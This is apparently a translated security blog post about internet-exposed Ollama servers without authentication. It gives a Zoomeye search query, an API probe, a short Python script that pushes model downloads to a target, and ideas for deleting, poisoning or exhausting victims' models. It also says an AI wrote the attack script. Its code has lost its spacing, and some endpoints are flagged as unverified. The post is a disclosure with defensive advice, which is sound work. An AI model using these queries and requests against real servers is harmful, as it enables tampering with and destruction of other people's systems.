Be careful, someone may have deleted your large model

0 19
AbstractRecent network security scans of AI infrastructure have found that there...

Abstract

Recent network security scans of AI infrastructure have found that there are a large number of unauthorised Ollama large model servers exposed on the public network globally. These servers not only expose model management interfaces but also exist with unauthorized access risks for sensitive operations. This paper reveals the technical details and potential hazards of this issue through empirical research.

Demonstrates "AI attacking AI has become a reality"

Be careful, someone may have deleted your large model

This test, except for the idea, is completed by AI (including various test cases and this document, from idea-attack test-to completion. About half an hour)

I. Discovery Process

1.1 Application of Asset Mapping Technology

Through the Zoomeye network space search engine, use the following syntax for target location:

app="Ollama" + country="*"

Figure 1: Zoomeye search results

1.2 API interface verification

Test open API endpoint:

GET /api/tags HTTP/1.1
Host: [Target IP]:11434

Typical response example:

{

"models": [

{

"name": "deepseek-r1:7b",

"model": "deepseek-r1:7b",

"modified_at": "2025-02-12T21:48:07.4588927+08:00",

"size": 4683075271,

"details": {

"parent_model": "",

"format": "gguf",

"family": "qwen2",

"families": [

"qwen2"

],

"parameter_size": "7.6B",

"quantization_level": "Q4_K_M"

}

}

]

}

II. Technical Risk Analysis

2.1 High-risk operation interface

Interface path

HTTP method

Risk level

Scope of impact

/api/pull

POST

Severe

Remote download of any model

/api/delete

DELETE

High risk

Delete existing models

/api/generate

POST

Medium risk

Model inference operation


2.2 Attack Vector Example

Core code of the automated attack script:

importrequests

defollama_rce(target_ip, model_name):
# Exploit model download vulnerability
payload = {"name": model_name, "stream": False}
resp = requests.post(f"http://{target_ip}:11434/api/pull", json=payload)

ifresp.status_code == 200:
print(f"[+] Successfully deployed {model_name} model")
# Subsequent inference attack code...

Figure 2: Automated attack demonstration


Third, Impact Range Statistics

Country/Region

Number of exposed hosts

Host with model

*/*

31,200

xxxx




Fourth, Advanced Attack Scenarios

  1. Model poisoning attack: Inject malicious models through /api/pull
  2. Resource exhaustion attack: Recursively download large models to exhaust storage
  3. Knowledge base leak: Access /api/knowledge-base (further verification required)
  4. Prompt word hijacking: Tamper with /system/prompts configuration

Fifth, Defense Recommendations

5.1 Basic Protection

# Configure reverse proxy access restrictions
location /api/ {
allow 192.168.1.0/24;
deny all;
auth_basic "Ollama Admin";
auth_basic_user_file /etc/nginx/.htpasswd;
}

5.2 Enhancement Measures

  1. Enable OLLAMA_HOST environment variable binding
  2. Configure TLS client certificate authentication
  3. Implement request frequency limitation (recommended <5req/min)
  4. Regularly audit the hash value of the model

Sixth, Conclusion

The rapid deployment of AI infrastructure and the lag in security construction form a sharp contrast. The cases disclosed in this article indicate that attackers have been able to complete the entire link from target discovery to attack implementation within a few minutes through automated tools.

The following is the AI assistance diagram

Figure 3: AI assists in completing the Python attack script

Figure 4: AI assists in writing this article


Figure 5: Program output of the threat of private large models on the entire network


Legal Statement: All technical details in this article are for security research purposes only and are prohibited from being used for illegal purposes.

(End of text) Finback QQ 18581

你可能想看:

As announced today, Glupteba is a multi-component botnet targeting Windows computers. Google has taken action to disrupt the operation of Glupteba, and we believe this action will have a significant i

Ensure that the ID can be accessed even if it is guessed or cannot be tampered with; the scenario is common in resource convenience and unauthorized vulnerability scenarios. I have found many vulnerab

4.5 Main person in charge reviews the simulation results, sorts out the separated simulation issues, and allows the red and blue teams to improve as soon as possible. The main issues are as follows

2.8 Continue to click the getTomcatWebServer method, find the initialize () method, and you can see the tomcat.start () method to start the Tomcat service.

b) It should have a login failure handling function, and should configure and enable measures such as ending the session, limiting the number of illegal login attempts, and automatically logging out w

In today's rapidly developing digital economy, data has become an important engine driving social progress and enterprise development. From being initially regarded as part of intangible assets to now

b) It should have the login failure handling function, and should configure and enable measures such as ending the session, limiting the number of illegal logins, and automatically exiting when the lo

How does GARTNER define mobile target defense (dynamic target defense, MTD)?

Generative AI Red Team Testing: How to Effectively Evaluate Large Language Models

Be alert! Your business system may have become a weapon for illegal and criminal activities of the black industry.

最后修改时间:
admin
上一篇 2025年03月27日 13:36
下一篇 2025年03月27日 13:59

评论已关闭